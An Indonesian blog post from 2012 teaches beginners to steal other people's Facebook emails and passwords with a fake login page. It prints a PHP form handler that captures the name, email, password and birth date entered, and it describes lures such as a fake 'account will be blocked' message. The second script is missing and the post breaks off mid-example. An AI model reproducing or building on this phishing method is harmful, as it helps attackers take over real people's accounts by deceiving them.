» Belajar hack facebook

Belajar hack facebook

Posted on Minggu, 02 September 2012 | No Comments

Belajar cara hack facebook mungkin ada yang belum tau caranya.bagaimana kita bisa mencuri password dan email milik orang lain.saya akan share salah satu cara hack facebook walaupun katanya jadul tapi lumayan ampuh dan simpel.terbukti hampir semua hacker di facebook yang saya temui mengunakan metode yang ini namanya adalahFake login. fake login adalah sebuah halaman palsu yang di buat hampir sama dengan halaman aslinya. terus bagaimana caranya kita membuat fake loginmari kita belajar bersama-sama.untuk para master script tinggalkan aja tutorial ini khusus untuk pemula. supaya pembahasan kita selaras dan sedikit serius saya akan kasih contoh dulu halaman fake loginyang pernah nyangkut di akun facebook saya. 1.ini adalah contoh halaman fake login untuk facebook scriptnya :

<?php
// Mengambil data formulir
$nama = $_POST['nama'];
$email = $_POST['email'];
$password = $_POST['password'];
$kelamin = $_POST['kelamin'];
$tgl_lahir = $_POST['tgl_lahir'];
$tgl_lahir2 = $_POST['tgl_lahir2'];
$tgl_lahir3 = $_POST['tgl_lahir3'];
// Menggunakannya
echo "<center>";
echo "<table>";
echo "<tr><td>Nama</td><th><i>$nama</i></th></tr>";
echo "<tr><td>Email</td><th><i>$email</i></th></tr>";
echo "<tr><td>Password</td><th><i>$password</i></th></tr>";
echo "<tr><td>Gender</td><th><i>$kelamin</i></th></tr>";
echo "<tr><td>Birth date</td><th><i>$tgl_lahir</i></th><th><i>$tgl_lahir2</i></th><th><i>$tgl_lahir3</i></th></tr>";
echo "</table>";
echo "</center>";

?>
kamu bisa lihat demo dari script diatas.dengan klik demo. cara penyebaran sihacker: merayu atau memancing saya untuk login disitu yang katanya lebih aman,lengkap dan lain-lain.pokoknya yang bagus-bagus deh. 2.ini adalah contoh halaman fake login untuk facebook security scriptnya : kamu bisa lihat demo dari script diatas.dengan klik demo. cara penyebaran sihacker: mengirimkan sebuah pesan kepada saya yang katanya facebook aku mau di blokir ini contoh pesan yang saya terima: Rating: 4.5

Leave a Reply